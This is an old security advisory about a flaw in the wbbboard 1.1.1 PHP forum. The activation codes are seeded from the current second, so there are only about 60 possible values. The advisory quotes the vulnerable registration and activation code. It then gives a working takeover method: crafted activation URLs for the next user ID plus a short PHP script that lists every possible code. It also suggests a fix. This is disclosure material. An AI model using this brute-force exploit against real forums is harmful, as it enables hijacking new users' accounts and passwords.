wbbboard 1.1.1 registration _new_users_vulnerability_

2002-05-28T00:00:00
ID SECURITYVULNS:DOC:2994
Type securityvulns
Reporter Securityvulns
Modified 2002-05-28T00:00:00

Description

wbbboard 1.1.1 registration new_users_vulnerability

wbbboard : i cant find any contact info in credits :( i send a message to wbbhacks.de and mywbb.de (support forums), they didnt reply for 3 days (i think enough)

Affected program : wbbboard 1.1.1 Vendor : http://www.woltlab.de/ Vulnerability-Class : security bug OS specific : No Remote : Yes Problem-Skill : High for users waiting for registration activatin None for activated users

SUMMARY

wbboard is php & mysql based forum.

Here some code(register.php)

$datum = date("s"); mt_srand($datum); $z = mt_rand(); $db_zugriff->query("INSERT INTO bb".$n."_user_table $db_zugriff->(username,userpassword,useremail,regemail,groupid,regdate,lastvisit,lastactivity,activation) $db_zugriff->VALUES $db_zugriff->('$name','$password','$email','$email','$default_group','$time','$time','$time',$z)");


after that script mail to user@mail.dom with url for activation here some code from action.php


if($action=="activation") { $result = activat($userid,$code); if($result == 1) eval ("\$output = \"".gettemplate("error1")."\";"); if($result == 2) eval ("\$output = \"".gettemplate("error22")."\";"); if($result == 3) eval ("\$output = \"".gettemplate("error23")."\";"); if(!$result) { $user_id = $userid; eval ("\$output = \"".gettemplate("note21")."\";"); $user_password = getUserPW($userid); session_register("user_id"); session_register("user_password"); setcookie("user_id", "$user_id", time()+(360024365)); setcookie("user_password", "$user_password", time()+(360024365)); } $ride = "main.php?styleid=$styleid$session"; }

IMPACT

You can steal NEW user account with his passwords.

EXPLOIT

Register in forum you will recieve a message like this: To continue registration http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322 Now You Know how many users on forum and can hijak users with userid=346(for example)

HEART OF EXPLOIT

| $datum = date("s");| | mt_srand($datum); | this code result only 30 original integer words :) | $z = mt_rand(); | i think it is not so hard to bruteforce


http://forum.dom/forum/action.php?action=activation&userid=346&code=1898087491 http://forum.dom/forum/action.php?action=activation&userid=346&code=1309289693 .... http://forum.dom/forum/action.php?action=activation&userid=346&code=356268007

You can get all variations with this script <?php for($i=0; $i<60; $i++) { mt_srand($i); echo mt_rand()."<BR>"; ^^^^^^^^^ here you are :) } ?>

SOLUTION: use simple rand() or realy unpredictable md5(uniqid(rand(),1))